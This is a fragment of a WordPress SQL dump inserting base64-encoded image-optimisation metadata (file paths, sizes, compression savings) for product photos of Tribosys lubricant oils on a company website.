INSERT INTO `wp_postmeta` VALUES (29363, 1651, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY3Nzc0LCJpZCI6IjE2NTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTEyLCJ0aW1lIjoxNDgzNTY3Nzc3LCJpZCI6MTY1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjg1NSwidGltZSI6MTQ4MzU2Nzc4MSwiaWQiOjE2NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo4NTAsInRpbWUiOjE0ODM1Njc3ODUsImlkIjoxNjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyNzcyLCJ0aW1lIjoxNDgzNTY3NzkwLCJpZCI6MTY1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUwMiwidGltZSI6MTQ4MzU2Nzc5NCwiaWQiOjE2NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MjQsInRpbWUiOjE0ODM1Njc3OTcsImlkIjoxNjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDUzLCJ0aW1lIjoxNDgzNTY3ODAwLCJpZCI6MTY1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc3OCwidGltZSI6MTQ4MzU2NzgwNCwiaWQiOjE2NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQwNSwidGltZSI6MTQ4MzU2NzgwNywiaWQiOjE2NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUyNSwidGltZSI6MTQ4MzU2NzgxMSwiaWQiOjE2NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWNoYWluLW9pbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtY2hhaW4tb2lsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1jaGFpbi1vaWwtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNywidGltZSI6MTQ4MzU2NzgxNSwiaWQiOjE2NTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29364, 1650, 'wpfc_optimisation_reduction', '13621'); 
INSERT INTO `wp_postmeta` VALUES (29365, 1650, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwuanBnIiwid2lkdGgiOjQ3NTIsImhlaWdodCI6MzE2OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NzgxOSwiaWQiOiIxNjUwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc3NiwidGltZSI6MTQ4MzU2NzgyMywiaWQiOjE2NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNDY3LCJ0aW1lIjoxNDgzNTY3ODI3LCJpZCI6MTY1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0NDEsInRpbWUiOjE0ODM1Njc4MzEsImlkIjoxNjUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo0ODI5LCJ0aW1lIjoxNDgzNTY3ODM2LCJpZCI6MTY1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyNywidGltZSI6MTQ4MzU2Nzg0MCwiaWQiOjE2NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjQsInRpbWUiOjE0ODM1Njc4NDMsImlkIjoxNjUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTI2LCJ0aW1lIjoxNDgzNTY3ODQ2LCJpZCI6MTY1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE0MTcsInRpbWUiOjE0ODM1Njc4NTAsImlkIjoxNjUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0ODQsInRpbWUiOjE0ODM1Njc4NTQsImlkIjoxNjUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo3NzYsInRpbWUiOjE0ODM1Njc4NTcsImlkIjoxNjUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZ2VuZXJhbC1wdXJwb3NlLW9pbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWdlbmVyYWwtcHVycG9zZS1vaWwtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1nZW5lcmFsLXB1cnBvc2Utb2lsLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4MTQsInRpbWUiOjE0ODM1Njc4NjEsImlkIjoxNjUwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29366, 1636, 'wpfc_optimisation_reduction', '10218'); 
